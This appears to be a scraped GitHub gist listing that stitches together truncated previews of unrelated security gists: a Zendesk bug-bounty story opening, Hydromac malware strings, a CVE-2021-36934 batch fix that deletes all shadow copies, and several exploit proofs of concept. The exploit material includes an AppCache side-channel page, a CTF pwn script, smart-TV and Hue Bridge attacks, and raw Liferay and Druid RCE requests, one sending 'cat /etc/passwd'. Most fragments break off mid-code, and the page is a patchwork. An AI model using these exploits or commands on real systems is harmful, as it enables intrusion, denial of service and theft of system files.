muuk lifa123

@hackermondev
hackermondev / zendesk.md
Last active April 24, 2025 04:34
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like [email protected]), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

@blotus
blotus / log4j_exploitation_attempts_crowdsec.md
Last active December 29, 2023 12:24
IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community

This list is no longer updated, thus the information is no longer reliable.

You can see the latest version (from October 2022) here

@hazcod
hazcod / CVE-2021-36934.bat
Created July 22, 2021 11:32
CVE-2021-36934 manual mitigation in command prompt.
echo ^> CVE-2021-36934 fixer
echo See https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934
echo Deleting current shadow copies...
vssadmin delete shadows /all /quiet
echo Fixing privilege issue...
icacls %windir%\system32\config\*.* /inheritance:e
echo Creating brand new shadow copy...
@tahaconfiant
tahaconfiant / hydromac_strings.txt
Created June 3, 2021 17:43
Hydromac Decrypted strings
encrypted string at 0x100051a6a decoded to :
encrypted string at 0x100051b2c decoded to : IOPlatformExpertDevice
encrypted string at 0x100051ff5 decoded to :
encrypted string at 0x100051ffe decoded to : BadAllocException
encrypted string at 0x100052057 decoded to : -
encrypted string at 0x100052060 decoded to : OutOfRangeException
encrypted string at 0x100051e12 decoded to : -
encrypted string at 0x100051e1b decoded to : BadAllocException
encrypted string at 0x100051e74 decoded to : -
encrypted string at 0x100051e7d decoded to : OutOfRangeException
@lbherrera
lbherrera / cache.php
Last active June 5, 2021 03:36
Source code for the exploit used in the "AppCache's forgotten tales" article (https://blog.lbherrera.me/posts/appcache-forgotten-tales/).
<html manifest="manifest.php?patternA=<?php echo $_GET["patternA"]; ?>&patternB=<?php echo $_GET["patternB"]; ?>&prefix=<?php echo $_GET["prefix"]; ?>">
<body>
<script>
let patternA = new URL(location).searchParams.get("patternA");
let patternB = new URL(location).searchParams.get("patternB");
let prefix = new URL(location).searchParams.get("prefix") || '';
applicationCache.addEventListener("cached", () => {
fetch("https://bugs.chromium.org/p/chromium/issues/entryafterlogin", {
mode: "no-cors",
@mishrasunny174
mishrasunny174 / exploit.py
Created March 21, 2021 18:27
Securinets CTF Quals 2021 | PWN | KILL SHOT
#!/usr/bin/env python3
from pwn import *
HOST, PORT = 'bin.q21.ctfsecurinets.com', 1338
# HOST, PORT = 'localhost', 1338
exe = ELF('./kill_shot')
libc = ELF('./libc_kill_shot.so')
def get_proc():
    if args.REMOTE:
@vavkamil
vavkamil / strong-tv-dos-poc.html
Last active March 11, 2021 11:41
strong-tv-dos-poc.html
<html>
<head>
<title></title>
</head>
<body>
<h1>Strong TV DoS exploit</h1>
<h2>Proof of Concept</h2>
<label for="internal_ip">Any internal IP:</label>
<input type="text" name="internal_ip" id="internal_ip" autocomplete="off" onchange="get_tv_ip()">
<br><br>
<html>
<head>
<title>Hue Bridge CORS PoC</title>
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://discovery.meethue.com/")
xhr.send();
xhr.onreadystatechange = function(e) {
var hue_ip;
@pikpikcu
pikpikcu / LiferayRCE(CVE-2020-7961).md
Last active September 9, 2022 03:46
POC Liferay RCE(CVE-2020-7961)
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap
@pikpikcu
pikpikcu / CVE-2021-25646.md
Last active January 10, 2022 12:32
CVE-2021-25646
POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close